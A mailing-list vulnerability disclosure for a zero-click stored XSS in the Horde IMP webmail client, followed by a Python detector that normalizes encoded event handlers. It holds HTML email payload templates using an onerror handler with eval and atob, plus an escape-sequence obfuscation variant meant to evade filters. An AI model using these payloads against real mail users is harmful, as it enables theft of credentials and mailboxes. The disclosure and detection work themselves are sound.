[imp] Horde v 5.2.22 vulnerability – obfuscation via HTML encoding – XSS payload
Nataša K. Arh
natasa.jakec at gmail.com
Fri Mar 21 09:04:40 UTC 2025
Hi.
I forgot to mention that currently the fastest way to mitigate the
vulnerability is to disable HTML email view and enable only text/plain view
of the email content.
Regards, Tasha & Vito
On Fri, Mar 21, 2025 at 9:18 AM Nataša K. Arh <natasa.jakec at gmail.com>
wrote:
> Hi.
>
> A vulnerability within Horde Web Client was discovered during our
> investigation. We have already seen this vulnerability being exploited in
> the wild.
>
> If an attacker crafts a specially prepared email, he/she can abuse this
> vulnerability to retrieve username, password and complete email database
> of a user mailbox.
>
>
> *Details*
>
> The content inside the base64-encoded text/html MIME part contains
> specially crafted HTML.
>
>
> --===============boundary==
> Content-Type: text/html; charset="utf-8"
> Content-Transfer-Encoding: base64
> MIME-Version: 1.0
>
> When an XSS payload is injected inside an HTML attribute, namely the “onerror”
> event handler, the server-side checks do not sanitize the payload and
> do not detect HTML-encoded characters.
>
> When the browser renders the page, it will decode and execute the injected
> payload.
>
> This is injected at the end of the legit HTML content.
>
>
> Example:
>
> <html>
> <body>
> <p>Hi...</p>
> Regards<br>
> <math><style>
> <img style=display:none src=nonexsisting.png
> onerror="window.parent.eval(window.parent.atob('base64 encoded JavaScript'));">
> </style></math>
> </body></html>
>
>
> To evade detection, Unicode characters can be used:
> For eval:
> - \u{065} represents the Unicode character for the letter "e."
> - \u{076} represents the Unicode character for the letter "v."
> - \141 (octal) or \x6C (hexadecimal) represents the letter "a."
> - \x6C represents the hexadecimal for the letter "l."
>
> For atob:
> - \u{61} represents the Unicode character for the letter "a."
> - \u{74} represents the Unicode character for the letter "t."
> - o is a regular character.
> - \142 (octal) represents the letter "b."
>
> Example:
>
> <html>
> <body>
> <p>Hi...</p>
> Regards<br>
> <math><style><img style=display:none src=nonexsisting.png
> onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('base64 encoded JavaScript'))"></style></math>
> </body></html>
>
> The “nonexsisting.png” image is searched for inside /imp; since it does not
> exist, the “onerror” content is executed.
>
> Specially crafted JavaScript code inside the 'base64 encoded
> JavaScript' is executed.
>
> This kind of crafted email is a zero-click attack, where no click is
> needed from the user side other than looking at this email in the Horde web
> client.
>
> Since there are still Horde web clients used, it would be nice to fix this
> vulnerability.
>
> --
> Regards.
>
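As an added illustration from the defender's side (not part of the report above, nor Horde code): a mail-content check that normalizes each on* handler value through HTML entity decoding and the JavaScript escape forms listed in the report before matching, which is the step the bypassed sanitizer lacks. The sample HTML is constructed from the report's second example with a placeholder in place of the base64 payload; the function and constant names are my own.

```python
import html
import re

# Constructed sample modelled on the report's second example; the base64
# payload is a placeholder, not a real script.
SAMPLE_HTML = r"""<html><body><p>Hi...</p>Regards<br>
<math><style><img style=display:none src=nonexsisting.png
onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('BASE64_PLACEHOLDER'))"></style></math>
</body></html>"""

# JavaScript string-escape forms named in the report: \u{...} code points,
# \uXXXX, \xXX and one-to-three-digit octal escapes.
_JS_ESCAPE = re.compile(
    r"\\u\{([0-9A-Fa-f]{1,6})\}"
    r"|\\u([0-9A-Fa-f]{4})"
    r"|\\x([0-9A-Fa-f]{2})"
    r"|\\([0-7]{1,3})"
)

# Any on* event-handler attribute with a quoted or bare value.
_EVENT_HANDLER = re.compile(
    r"""\b(on[a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)

SUSPICIOUS_NAMES = ("eval", "atob", "Function", "window.parent")  # warrant quarantine


def decode_js_escapes(text: str) -> str:
    """Replace JS string escapes with the characters they denote."""
    def repl(m: re.Match) -> str:
        cp, u4, x2, octal = m.groups()
        if octal is not None:
            return chr(int(octal, 8))
        return chr(int(cp or u4 or x2, 16))
    return _JS_ESCAPE.sub(repl, text)


def normalize_handler_value(raw: str) -> str:
    """Undo HTML entities first, then JS escapes: the form the browser runs."""
    return decode_js_escapes(html.unescape(raw))


def find_obfuscated_handlers(body: str) -> list[dict]:
    """One finding per on* handler naming a suspicious identifier once normalized;
    hidden_by_encoding lists the names that are not visible in the raw value."""
    findings = []
    for m in _EVENT_HANDLER.finditer(body):
        raw = next(g for g in m.groups()[1:] if g is not None)
        normalized = normalize_handler_value(raw)
        hits = [n for n in SUSPICIOUS_NAMES if n in normalized]
        if hits:
            findings.append({"attribute": m.group(1).lower(), "normalized": normalized,
                             "hits": hits, "hidden_by_encoding": [n for n in hits if n not in raw]})
    return findings
```

A plain substring match for "eval" on the raw sample finds nothing, while the normalized value exposes both eval and atob; a filter only needs the normalization step, not the full decoded payload, to block or quarantine such mail.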